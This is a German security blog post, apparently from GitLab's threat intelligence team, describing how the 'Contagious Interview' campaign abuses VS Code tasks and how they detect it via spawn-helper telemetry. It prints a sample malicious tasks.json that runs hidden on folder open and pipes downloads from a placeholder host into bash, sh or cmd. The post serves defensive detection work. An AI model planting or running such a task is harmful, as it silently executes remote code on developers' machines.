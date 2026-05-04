Veröffentlicht am: 4. Mai 2026
6 Minuten Lesezeit
Benutzerdefinierte Kontrollen zur Erkennung und Prävention von Malware-Kampagnen wie Contagious Interview – und Deployment in der eigenen Umgebung.
GitLabs Threat Intelligence-Team, Teil des Security Operations-Teams, hat kürzlich einen umfangreichen Artikel veröffentlicht, der nordkoreanische Angriffsmethoden offenlegt und erläutert, wie GitLab diese Akteure verfolgt und gestört hat. Security Operations umfasst auch das Security Incident Response Team (SIRT), Security Logging, Signals Intelligence und das Red Team. Diese enge Zusammenarbeit über verschiedene Sicherheitsdisziplinen hinweg ermöglicht es, Erkenntnisse aus der Threat Intelligence zu nutzen, relevante Bedrohungsakteure über Red- und Purple-Team-Übungen zu emulieren und auf dieser Basis proaktiv Erkennungs- und Präventionsmaßnahmen zu entwickeln.
Parallel zur Entdeckung der nordkoreanischen Angriffsmethoden und der damit verbundenen Contagious Interview-Bedrohungskampagne wurden benutzerdefinierte Kontrollen entwickelt, um ähnliche Malware-Kampagnen zu verhindern – insbesondere solche, die IDE-Angriffe nutzen. In diesem Artikel werden diese Kontrollen sowie die eingesetzten Techniken vorgestellt, mit denen Kunden geschützt, die breitere Security-Community unterstützt und diese bösartigen Akteure weiter zurückgedrängt werden.
Der Artikel über nordkoreanische Angriffsmethoden konzentrierte sich auf eine breite Palette von Angriffen, Techniken und Indicators of Compromise (IOCs), die nordkoreanische Staatsakteure aktiv für gezielte und breit angelegte Angriffe einsetzen. Einer der beschriebenen Angriffswege war die Nutzung von Visual Studio Code-Tasks zur Malware-Verteilung. Die Contagious Interview-Bedrohungskampagne nutzt häufig gefälschte Vorstellungsgespräche, um Opfer dazu zu bringen, ein Code-Repository herunterzuladen und zu öffnen – was einen Angriff über VS Code-Tasks ermöglicht.
VS Code-Tasks sind
ein Mechanismus zur Automatisierung häufiger Aufgaben, die Entwickler beim
Öffnen eines Repositorys ausführen möchten – etwa Linting, Bauen,
Paketieren, Testen oder Deployen von Softwaresystemen. Über eine einfache
Konfigurationsdatei im Repository,
tasks.json, kann Code automatisch
ausgeführt werden, sobald das Repository geöffnet wird. Dafür muss dem
Repository Vertrauen gewährt werden.
Contagious Interviews Pretexte beruhen häufig auf bösartigen Repositories, sodass der Schwenk zu VS Code-Tasks für die Codeausführung eine einfache Fortsetzung dieses Pretexts ist. Das Ziel wird aufgefordert, das bösartige Repository in VS Code herunterzuladen und zu öffnen – häufig zum Zweck eines Code-Reviews im Rahmen eines Vorstellungsgesprächs. Da die Opfer glauben, sich für eine Stelle zu bewerben, stehen sie unter starkem Druck, dem Workspace des Interviewers zu "vertrauen" – was die bösartige Task ohne ihr Wissen zur Ausführung bringt.
Ein Beispiel für eine bösartige
tasks.json-Datei ist unten dargestellt.
Sie ist recht einfach aufgebaut: Sie erkennt das Betriebssystem und lädt
die nächste Malware-Stufe für die jeweilige Plattform herunter, wobei eine
curl | bash-Struktur verwendet wird. Die enthaltenen Domains sind
Platzhalter und keine tatsächlichen IOCs. Detaillierte IOCs für diese
Akteure wurden in einem
früheren Blogbeitrag
veröffentlicht.
"version": "1.0.8",
"tasks": [
{
"label": "env",
"type": "shell",
"osx": {
"command": "curl 'https://www.example[.]com/settings/mac?flag=8' | bash"
},
"linux": {
"command": "wget -q0- 'https://www.example[.]com/settings/linux?flag=8' | sh"
},
"windows": {
"command": "curl https://www.example[.]com/settings/windows?flag=8 | cmd"
},
"problemMatcher": [],
"presentation": {
"reveal": "never",
"echo": false,
"focus": false,
"close": true,
"panel": "dedicated",
"showReuseMessage": false
},
"runOptions": {
"runOn": "folderOpen"
}
}
]
Diese bösartige Codeausführung wird typischerweise genutzt, um Infostealer zu deployen, Passwörter und Kryptowährungen zu stehlen und letztlich Persistenz zu etablieren, um die vertrauenswürdigen Zugänge der Opfer zu Unternehmensnetzwerken zu missbrauchen.
Sobald klar war, wie der Bedrohungsakteur initiale Codeausführung erlangt, war das Ziel für präventive Maßnahmen definiert – diese Angriffe abzufangen, bevor GitLab-Workstations ins Visier geraten.
Das Ziel ist stets, Erkennungs- und Präventionskontrollen so "niedrigschwellig" wie möglich zu entwickeln, da diese Erkennungstypen typischerweise schwieriger zu umgehen sind. Außerdem deutete die Threat Intelligence darauf hin, dass auch andere Projekte, die VS Code als Basis nutzen, für diesen Repository-Angriff anfällig sind. Anstatt sich auf eine VS Code-spezifische Erkennung zu konzentrieren, wurde daher der Bereich "nächste an das Betriebssystem" gesucht, an dem diese bösartige Codeausführung identifiziert werden kann. Damit lassen sich nicht nur Angriffe über VS Code-Tasks erkennen, sondern auch Angriffe über VS Code-Forks oder ähnliche Node-basierte IDEs mit Hintergrundtasks.
Bei der Analyse des VS Code-Quellcodes wurde festgestellt, dass die
node-pty.spawn()-Bibliotheksfunktion im gesamten Produkt verwendet wird,
wenn Subprozesse benötigt werden. Die node-pty-Bibliothek
ist äußerst verbreitet – zum Zeitpunkt der Erstellung dieses Artikels
verzeichnet sie über eine Million wöchentlicher Downloads. Sie ermöglicht
Node-Anwendungen (einschließlich Electron-Anwendungen wie VS Code), Subprozesse
aus einem Node-Kontext heraus zu forken, was zu Aufrufen ihrer eigenen
Binary
spawn-helper führt. Beim Start von Subprozessen wird
spawn-helper
als Child-Prozess der aufrufenden Node-Anwendung gestartet.
Nach einer Purple-Team-Operation zur Emulation dieses spezifischen
Angriffspfades wurde die EDR-Telemetrie ausgewertet, um nicht nur eine
robuste Erkennung für den emulierten Angriff zu entwickeln, sondern diese
auch so zu verfeinern, dass nur verdächtige Aktivitäten alarmiert werden –
nicht legitime Entwickleraktivitäten. Dabei wurde festgestellt, dass
spawn-helper in Situationen aufgerufen wird, in denen VS Code Tasks im
Hintergrund starten möchte, ohne Sichtbarkeit oder Interaktion des
Nutzers. Ein
Code Helper-Binary hingegen wird aufgerufen, wenn neue
Prozesse (wie das integrierte Terminal) im Vordergrund mit
Nutzerinteraktion gestartet werden.
Das ermöglicht Erkennungen, die ausschließlich auf Subprozesse abzielen, die ohne Wissen der Nutzenden gestartet werden – und False Positives vermeiden, die Subprozesse alarmieren würden, die jemand beim Arbeiten in seiner IDE bewusst startet.
Wie bereits dargestellt, enthält eine häufig gesehene bösartige Task
Befehle, die ein
curl | <shell> aus einer Task heraus ausführen. Zwar
kann
curl | bash eine legitime Methode zur Softwareinstallation wie
Homebrew sein – in der eigenen Umgebung sollte das jedoch niemals im
Hintergrund ohne Wissen der Nutzenden geschehen. Diese Unterscheidung
ermöglichte es,
spawn-helper-basierte Erkennungen so abzustimmen, dass
nicht jede Hintergrundtask alarmiert, sondern nur Verhaltensweisen
ausgelöst werden, die in der eigenen Umgebung ungewöhnlich und verdächtig
sind. Seit der Implementierung dieser Erkennungstechnik gab es keine
False Positives – obwohl ein Großteil der Organisation täglich VS Code
verwendet.
Obwohl dieser Artikel sich auf die Erkennung von
spawn-helper in der
eigenen Umgebung konzentriert, ist dies nur eine von vielen
Verteidigungsschichten, die zum Schutz vor IDE-Task-basierten Angriffen
implementiert werden können.
Neben dem Einsatz von EDR-Instrumentierung zur Erkennung bösartiger Tasks zur Laufzeit lässt sich die eigene Fleet proaktiv gegen diese Angriffsart absichern, indem globale Konfigurationen gepusht werden, die Task-Ausführungen in VS Code deaktivieren. Falls das für Entwickler zu störend ist, kann die Umgebung auch darauf untersucht werden, wie häufig Nutzende Trusted Workspaces und Trusted Workspace Folders in ihrer typischen VS Code-Nutzung verwenden – und Awareness-Kampagnen gestartet werden, um das Unternehmen über die Risiken dieses Contagious Interview-Angriffspfades aufzuklären.
GitLab Security Operations arbeitet rund um die Uhr, um Kunden und das Unternehmen zu schützen. Durch eng verzahnte Sicherheitsteams gelingt es, handlungsrelevante Threat Intelligence zu produzieren, diese für Adversary-Emulation-Operationen zu nutzen und letztlich technische sowie prozedurale Präventions- und Erkennungstechniken zu entwickeln, die Kunden und Unternehmen schützen.
Da VS Code-Tasks in der Security-Community zunehmend Aufmerksamkeit erhalten, ist es möglich, dass weitere Bedrohungsakteure diesen Angriffspfad für eigene Zwecke nutzen werden. Es ist zu hoffen, dass dieses kleine Beispiel der Arbeit zum Schutz von GitLab und Kunden gegen Advanced Persistent Threats andere dazu inspiriert, ähnliche Maßnahmen zu ergreifen und gemeinsam daran mitzuwirken, diese Bedrohungsakteure weiter zurückzudrängen.
Innovationen und Forschung auf der Security Labs-Website verfolgen.
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